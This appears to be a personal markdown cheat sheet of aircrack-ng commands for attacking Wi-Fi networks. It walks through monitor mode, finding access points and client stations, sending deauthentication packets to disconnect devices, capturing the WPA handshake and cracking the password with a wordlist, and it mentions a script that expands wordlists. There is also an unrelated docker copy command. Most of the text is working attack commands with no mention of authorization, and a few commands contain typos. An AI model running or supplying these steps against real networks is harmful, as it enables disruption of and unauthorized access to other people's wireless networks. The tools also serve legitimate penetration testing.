## Successful deauthorization attack.
```bash
# Find wifi AP MAC address (BSSID) and channel information.
$ iwlist wlp3s0 scanning  # gets you a list of APs

# Set network card to monitor mode.
$ airmon-ng set wlp3s0

# Find devices (STATION) on the target network.
$ airodump-ng -c <channel nr> -d <BSSID> wlp3s0mon

# Go back to normal card mode.
$ airmon-ng stop wlp3s0mon
# Fire a deauthorization attack at a device (if you ommit -c, you target the entire network).
$ aireplay-ng --deauth 10 -a <BSSID> -c <STATION> wlp3s0
```

## Finding APs, getting a handshake.
```bash
# You don't need iwlist.
# First thing, enable monitor mode.
$ airmon-ng wlp3s0
# List APs.
$ airdump-ng wlp3s0
# Now, dump the AP traffic.
$ airodump-ng --channel 11 --bssid <BSSID(mac addr)> --write <filename> wlp3s0mon
# While dumping, fire a deauthentication attack in another terminal.
$ aireplay-ng -0 10 -a <BSSID> wlp3s0mon
# In the airodump-ng window, you'll see <BSSID>: handshake captured.
# Also, under Probes, youll see to which network a client has tried to connect.
```

## Cracking the password hash.
You'll need a wordlist beforehand. 1-1 match?  
```$ aircrack-ng -w wordlist.txt file.cap```  
One possibility is using `crunch`.  
I've made a bash script for prepending and appending a string (e.g. house number) to each word in a wordlist.
It outputs a new wordlist (3*size).
Check out `./append_prepend.sh`.


## Moving files to/from container
`$ docker cp <container_name>:<path> <dest_path>`

